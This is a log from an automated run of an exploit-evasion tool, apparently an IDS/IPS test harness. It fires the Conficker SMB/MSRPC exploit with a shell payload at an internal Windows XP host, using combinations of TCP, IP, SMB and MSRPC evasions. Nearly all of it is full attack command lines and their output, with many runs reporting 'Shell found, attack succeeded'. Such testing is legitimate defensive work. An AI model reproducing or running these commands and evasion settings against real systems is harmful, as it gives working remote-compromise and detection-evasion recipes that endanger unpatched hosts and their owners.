- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25618 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=sgNECLIvgpo --evasion=[smb_connect,end]tcp_chaff,"8","nullchksum|nullflag|shorthdr","shuffle" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"3","zero" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed sgNECLIvgpq
- The following evasions are applied from stage smb_connect to end:
- - With every 8 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP checksum.
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * Duplicate packet has shuffled original payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Add a zero urgent data byte to every 3 TCP segment.
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.110:25618 -> 10.35.1.207:445
- Terminated
- 8943 runs averaging 1.91 runs / second ; progress: 4676/43200...................
- 8962 runs averaging 1.91 runs / second ; progress: 4681/43200.........2015-06-08 00:37:33 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57107 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=2vlqNASig6Q --evasion=[smb_openpipe,end]smb_decoytrees,"4","2","3","random_msrpcreq" --evasion=[smb_openpipe,end]tcp_chaff,"21","nullchksum|nullflag|outofwindow|shorthdr|longhdr","unmodified" --verifydelay=1000 --payload=shell
- Info: Using random seed 2vlqNASig6T
- The following evasions are applied from stage smb_openpipe to end:
- - Before normal SMB writes, 4 SMB trees are opened and 2 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.113:57107 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .......2015-06-08 00:37:35 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17874 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=TcBcODpf5zs --evasion=[msrpc_req,end]tcp_paws,"1","7","zero" --evasion=[netbios_connect,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed TcBcODpf5zt
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage msrpc_req to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.115:17874 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 8981 runs averaging 1.92 runs / second ; progress: 4686/43200..............
- 8995 runs averaging 1.92 runs / second ; progress: 4691/43200.....Pid 7992 timed out - killed
- 2015-06-08 00:37:44 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26909 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=CqYGL7dhLx0 --evasion=[smb_connect,smb_opentree]tcp_chaff,"50%","chksum|outofwindow|shorthdr","zero" --evasion=[msrpc_req,end]tcp_paws,"1","6","zero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed CqYGL7dhLx0
- The following evasions are applied from stage smb_connect to smb_opentree:
- - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * Invalid TCP checksum.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * Duplicate packet has 0x00 bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random alphaurgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.112:26909 -> 10.35.1.207:445
- Terminated
- .....
- 9006 runs averaging 1.92 runs / second ; progress: 4696/43200..................
- 9024 runs averaging 1.92 runs / second ; progress: 4701/43200.....2015-06-08 00:37:52 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=65431 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=OeNPvjc5Qpo --evasion=[netbios_connect,msrpc_bind]ipv4_opt,"75%","inc","random_alpha" --evasion=[msrpc_req,end]smb_decoytrees,"4","6","8","random_msrpcreq" --verifydelay=1000 --payload=shell
- Info: Using random seed OeNPvjc5Qpo
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has random alphabetic bytes as payload
- The following evasions are applied from stage msrpc_req to end:
- - Before normal SMB writes, 4 SMB trees are opened and 6 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.117:65431 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .....2015-06-08 00:37:54 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18113 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=5emIDQWoFM4 --evasion=[smb_connect,end]smb_chaff,"21","write_flag","alphanum" --evasion=[smb_openpipe,end]tcp_paws,"25%","234116151","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 5emIDQWoFM7
- The following evasions are applied from stage smb_connect to end:
- - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
- The following evasions are applied from stage smb_openpipe to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 234116151> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.112:18113 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 9044 runs averaging 1.92 runs / second ; progress: 4706/43200.......................
- 9067 runs averaging 1.92 runs / second ; progress: 4711/43200.................
- 9084 runs averaging 1.93 runs / second ; progress: 4716/43200..
- 9086 runs averaging 1.92 runs / second ; progress: 4721/43200
- 9086 runs averaging 1.92 runs / second ; progress: 4726/43200...........
- 9097 runs averaging 1.92 runs / second ; progress: 4731/43200...............
- 9112 runs averaging 1.92 runs / second ; progress: 4736/43200......
- 9118 runs averaging 1.92 runs / second ; progress: 4741/43200......
- 9124 runs averaging 1.92 runs / second ; progress: 4746/43200........
- 9132 runs averaging 1.92 runs / second ; progress: 4751/43200..........
- 9142 runs averaging 1.92 runs / second ; progress: 4756/43200....
- 9146 runs averaging 1.92 runs / second ; progress: 4761/43200.2015-06-08 00:38:54 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17243 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=mBAIsd7uGQ8 --evasion=[smb_openpipe,end]smb_decoytrees,"7","1","3","random_msrpcreq" --evasion=[smb_connect,msrpc_bind]tcp_overlap,"6","new","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed mBAIsd7uGQ+
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - TCP segments are set to overlap by 6 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - Before normal SMB writes, 7 SMB trees are opened and 1 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.110:17243 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 9149 runs averaging 1.92 runs / second ; progress: 4766/43200.........
- 9158 runs averaging 1.92 runs / second ; progress: 4771/43200..........
- 9168 runs averaging 1.92 runs / second ; progress: 4776/43200...............
- 9183 runs averaging 1.92 runs / second ; progress: 4782/43200...2015-06-08 00:39:16 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30782 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=0FzzJYfIw6U --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"6","6","2048","random_alphanum" --evasion=[start,end]tcp_paws,"5","4","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 0FzzJYfIw6X
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 6 SMB trees are opened and 6 writes are performed to them. The write payload is 2048 random alphanumeric bytes.
- Info: NetBIOS connection 10.62.90.117:30782 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 9187 runs averaging 1.92 runs / second ; progress: 4787/43200.....
- 9192 runs averaging 1.92 runs / second ; progress: 4792/43200...
- 9195 runs averaging 1.92 runs / second ; progress: 4797/43200.....
- 9200 runs averaging 1.92 runs / second ; progress: 4802/43200.
- 9201 runs averaging 1.91 runs / second ; progress: 4807/432002015-06-08 00:39:37 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41485 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=SM6cPJn5+OQ --evasion=[msrpc_bind,end]tcp_paws,"1","9","random" --evasion=[msrpc_bind,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed SM6cPJn5+OR
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random bytes as payload
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.117:41485 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 9205 runs averaging 1.91 runs / second ; progress: 4812/43200.........
- 9214 runs averaging 1.91 runs / second ; progress: 4817/43200........2015-06-08 00:39:51 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43229 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=fd/3gZhjdgM --evasion=[smb_opentree,end]tcp_paws,"75%","240370247","shuffle" --evasion=[smb_opentree,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed fd/3gZhjdgN
- The following evasions are applied from stage smb_opentree to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 240370247> and has shuffled original payload
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.112:43229 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ....
- 9227 runs averaging 1.91 runs / second ; progress: 4822/43200......
- 9233 runs averaging 1.91 runs / second ; progress: 4827/43200.
- 9234 runs averaging 1.91 runs / second ; progress: 4832/43200
- 9234 runs averaging 1.91 runs / second ; progress: 4837/43200.....
- 9239 runs averaging 1.91 runs / second ; progress: 4842/43200.......
- 9246 runs averaging 1.91 runs / second ; progress: 4847/43200
- 9246 runs averaging 1.91 runs / second ; progress: 4852/43200
- 9246 runs averaging 1.90 runs / second ; progress: 4857/43200.2015-06-08 00:40:30 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25007 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=4t8G7ohmFd8 --evasion=[smb_connect,msrpc_bind]smb_chaff,"13","write_flag","msrpc" --evasion=[smb_openpipe,end]smb_decoytrees,"4","4","2","random_msrpcreq" --verifydelay=1000 --payload=shell
- Info: Using random seed 4t8G7ohmFd/
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Before every 13th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- The following evasions are applied from stage smb_openpipe to end:
- - Before normal SMB writes, 4 SMB trees are opened and 4 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.112:25007 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 9251 runs averaging 1.90 runs / second ; progress: 4862/43200...........
- 9262 runs averaging 1.90 runs / second ; progress: 4867/43200.....
- 9267 runs averaging 1.90 runs / second ; progress: 4872/43200.Pid 10886 timed out - killed
- 2015-06-08 00:40:43 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14403 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=ozOEXUfZ3/w --evasion=[smb_openpipe,end]smb_chaff,"3","write_flag","msrpc" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed ozOEXUfZ3/y
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a random alphaurgent data byte to every 2 TCP segment.
- The following evasions are applied from stage smb_openpipe to end:
- - Before every 3th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- Info: NetBIOS connection 10.62.90.111:14403 -> 10.35.1.207:445
- Terminated
- ....
- 9273 runs averaging 1.90 runs / second ; progress: 4877/43200......
- 9279 runs averaging 1.90 runs / second ; progress: 4882/432002015-06-08 00:40:52 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38297 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=rrkcEtoysN8 --evasion=[smb_connect,smb_openpipe]ipv4_frag,"56" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"75%","268435454","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed rrkcEtoysN+
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - IPv4 fragments with at most 56 bytes per fragment
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.112:38297 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .Pid 11141 timed out - killed
- 2015-06-08 00:40:53 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64976 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=nm6gz4exUZ4 --evasion=[start,netbios_connect]tcp_paws,"75%","268435455","alpharandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
- Info: Using random seed nm6gz4exUZ6
- The following evasions are applied from stage start to netbios_connect:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Add a random urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.119:64976 -> 10.35.1.207:445
- Terminated
- .......
- 9289 runs averaging 1.90 runs / second ; progress: 4887/43200.........
- 9298 runs averaging 1.90 runs / second ; progress: 4892/43200...
- 9301 runs averaging 1.90 runs / second ; progress: 4897/43200.....
- 9306 runs averaging 1.90 runs / second ; progress: 4902/43200.....
- 9311 runs averaging 1.90 runs / second ; progress: 4907/43200.........
- 9320 runs averaging 1.90 runs / second ; progress: 4912/43200.2015-06-08 00:41:23 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39207 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=3I+N5IlyQj0 --evasion=[smb_opentree,end]smb_writeandxpad,"1024","random_alphanum" --evasion=[msrpc_req,end]tcp_paws,"1","268435454","shuffle30" --verifydelay=1000 --payload=shell
- Info: Using random seed 3I+N5IlyQj3
- The following evasions are applied from stage smb_opentree to end:
- - 1024 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- The following evasions are applied from stage msrpc_req to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has 30 bytes of original payload, then shuffled original payload
- Info: NetBIOS connection 10.62.90.112:39207 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- Pid 11571 timed out - killed
- 2015-06-08 00:41:23 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=32339 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=jX8rcN/h25o --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"16" --evasion=[smb_opentree,end]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed jX8rcN/h25q
- The following evasions are applied from stage smb_opentree to end:
- - Add a zero urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - IPv4 fragments with at most 16 bytes per fragment
- Info: NetBIOS connection 10.62.90.118:32339 -> 10.35.1.207:445
- Terminated
- ..........
- 9333 runs averaging 1.90 runs / second ; progress: 4917/43200.........2015-06-08 00:41:30 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34803 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=tmDsj+XmrZ8 --evasion=[netbios_connect,end]ipv4_frag,"632" --evasion=[msrpc_req,end]tcp_paws,"50%","10","shuffle30" --evasion=[msrpc_req,end]tcp_segvar,"24730","31998" --verifydelay=1000 --payload=shell
- Info: Using random seed tmDsj+XmrZ+
- The following evasions are applied from stage netbios_connect to end:
- - IPv4 fragments with at most 632 bytes per fragment
- The following evasions are applied from stage msrpc_req to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has 30 bytes of original payload, then shuffled original payload
- - TCP packets are segmented to contain between 24730 and 31998 bytes of payload.
- Info: NetBIOS connection 10.62.90.119:34803 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ..
- 9345 runs averaging 1.90 runs / second ; progress: 4922/43200..........
- 9355 runs averaging 1.90 runs / second ; progress: 4927/43200..........
- 9365 runs averaging 1.90 runs / second ; progress: 4932/43200...............
- 9380 runs averaging 1.90 runs / second ; progress: 4937/43200.........
- 9389 runs averaging 1.90 runs / second ; progress: 4942/43200...........
- 9400 runs averaging 1.90 runs / second ; progress: 4947/43200...........
- 9411 runs averaging 1.90 runs / second ; progress: 4952/43200.........2015-06-08 00:42:05 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11897 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=1Pcgp2wrgcE --evasion=[msrpc_bind,msrpc_req]ipv4_frag,"456" --evasion=[smb_openpipe,msrpc_bind]smb_decoytrees,"6","6","2","random_alphanum" --evasion=[smb_connect,msrpc_req]tcp_paws,"5","216017382","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed 1Pcgp2wrgcH
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 216017382> and has shuffled original payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Before normal SMB writes, 6 SMB trees are opened and 6 writes are performed to them. The write payload is 2 random alphanumeric bytes.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - IPv4 fragments with at most 456 bytes per fragment
- Info: NetBIOS connection 10.62.90.118:11897 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ........
- 9429 runs averaging 1.90 runs / second ; progress: 4957/43200.............
- 9442 runs averaging 1.90 runs / second ; progress: 4962/43200......2015-06-08 00:42:15 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25532 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=biR6QHYn0fA --evasion=[smb_connect,end]ipv4_frag,"56" --evasion=[msrpc_bind,end]tcp_paws,"75%","57019005","alpharandomized" --evasion=[msrpc_bind,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed biR6QHYn0fB
- The following evasions are applied from stage smb_connect to end:
- - IPv4 fragments with at most 56 bytes per fragment
- The following evasions are applied from stage msrpc_bind to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 57019005> and has original payload with alphabetic bytes randomized
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.112:25532 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- 2015-06-08 00:42:17 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53786 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=6PvoPo84oSk --evasion=[start,smb_connect]tcp_chaff,"2","chksum|nullchksum|nullflag","unmodified" --evasion=[netbios_connect,end]tcp_paws,"75%","208945","alpharandomized" --evasion=[netbios_connect,smb_openpipe]tcp_segvar,"63557","65534" --verifydelay=1000 --payload=shell
- Info: Using random seed 6PvoPo84oSn
- The following evasions are applied from stage start to smb_connect:
- The following evasions are applied from stage netbios_connect to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 208945> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- - TCP packets are segmented to contain between 63557 and 65534 bytes of payload.
- Info: NetBIOS connection 10.62.90.112:53786 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- 9450 runs averaging 1.90 runs / second ; progress: 4967/43200..
- 9452 runs averaging 1.90 runs / second ; progress: 4972/43200
- 9452 runs averaging 1.90 runs / second ; progress: 4977/43200Pid 12388 timed out - killed
- 2015-06-08 00:42:29 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25941 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=HYzAAspzemw --evasion=[smb_opentree,smb_openpipe]tcp_paws,"13","268435455","zero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed HYzAAspzemw
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 0x00 bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random alphanumeric urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.116:25941 -> 10.35.1.207:445
- Terminated
- ..2015-06-08 00:42:31 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37295 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=f4Rayn2XGBc --evasion=[msrpc_bind,msrpc_req]msrpc_ndrflag,"char_ebcdic","float_vax","byte3_zero","byte4_zero" --evasion=[netbios_connect,smb_opentree]tcp_paws,"2","6","alpharandomized" --evasion=[msrpc_bind,end]tcp_paws,"3","4","random" --verifydelay=1000 --payload=shell
- Info: Using random seed f4Rayn2XGBd
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_bind to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - MSRPC NDR flag is modified:
- * EBCDIC character encoding
- * VAX floating point value encoding
- * Reserved 3rd byte is set to zero
- * Reserved 4th byte is set to zero
- Info: NetBIOS connection 10.62.90.117:37295 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 9459 runs averaging 1.90 runs / second ; progress: 4982/43200...............
- 9474 runs averaging 1.90 runs / second ; progress: 4988/43200..Pid 12663 timed out - killed
- 2015-06-08 00:42:38 INFO
- Timed out (10.62.90.115):
